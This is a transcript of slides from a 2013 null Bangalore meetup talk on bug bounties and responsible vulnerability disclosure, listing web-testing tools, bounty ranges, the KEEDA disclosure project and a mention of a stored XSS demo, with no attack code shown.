disclosing vulnerabilities for fun and profit
DESCRIPTION
null Bangalore Chapter, January 2013 MeetTRANSCRIPT
Disclosing Vulnerabilities
FOR FUN & PROFIT
Nikhil.P.Kulkarni
www.twitter.com/nikchillz
Nikhil Kulkarni
A 21yr old Tech Enthusiast.
A Blogger, Web Designer, Graphical
Designer
Mainly into Web App Testing
(aka Intrud3r)
facebook.com/nikchillz
twitter.com/nikchillz
File Inclusion BUG
VULNERABILITY
DISCLOSURE
FULL DISCLOSURE
RESPONSIBLE DISCLOSURE
Tools Proxy:
Burp Suite
Web Scarab
Fiddler
And many more…!!!
Firefox Addons:
Tamper Data
Web Developer Extensions
Live HTTP Headers
Firebug
Hackbar
XSS Me
And many more…!!!
Optional:
Camtasia Studio(Screen Recorder)
Snipping Tool(Screenshots)
Useful Tools:
IRONWASP
XENOTIX
And many more…!!!
$100 to $20,000
$500 to $5000
500 to $3000
Unknown Price money (Approx. $50 to $10,000)
$500 + T-Shirt
http://computersecuritywithethicalhacking.blogspot.in/2012/09/web-product-vulnerabilty-bug-bounty.html
Normal
Resume Resume with
HOF
Find Bugs
Report Them
Get Reward
Party
Broke
Never go for Full Disclosure without company’s permission.
Always see that, you’ve made a Responsible Disclosure before going for
Full Disclosure.
KEEDA Project A NULL Community Initiative
Highlights:
Informs the vendors and Certs about any
vulnerabilities found in the wild.
The credit is given to the bug submitter
itself.
Does not charge the vendor in return.
But at least a thank you letter from the
Vendor.
If vendor does not rectify the bug, the
FULL DISCLOSURE of the bug is done using
Keeda Portal.
Stored XSS in the Official Website of
DELL
DEMO
XSS CSRF SQLi And many
more
Kislay Bhardwaj
Prashanth.K.V
Riyaz Walikar
Amol Naik
Prasanna Kangasabai
Akash Mahajan
Sabari Selvan
Srikanth Rao
Himanshu Kumar Das
Suriya Prakash
Harsimram Walia
Lava Kumar
And the whole of NULL Bangalore Chapter.
Thank You
NULL Bangalore
Nikhil.P.Kulkarni www.facebook.com/nikchillz www.twitter.com/nikchillz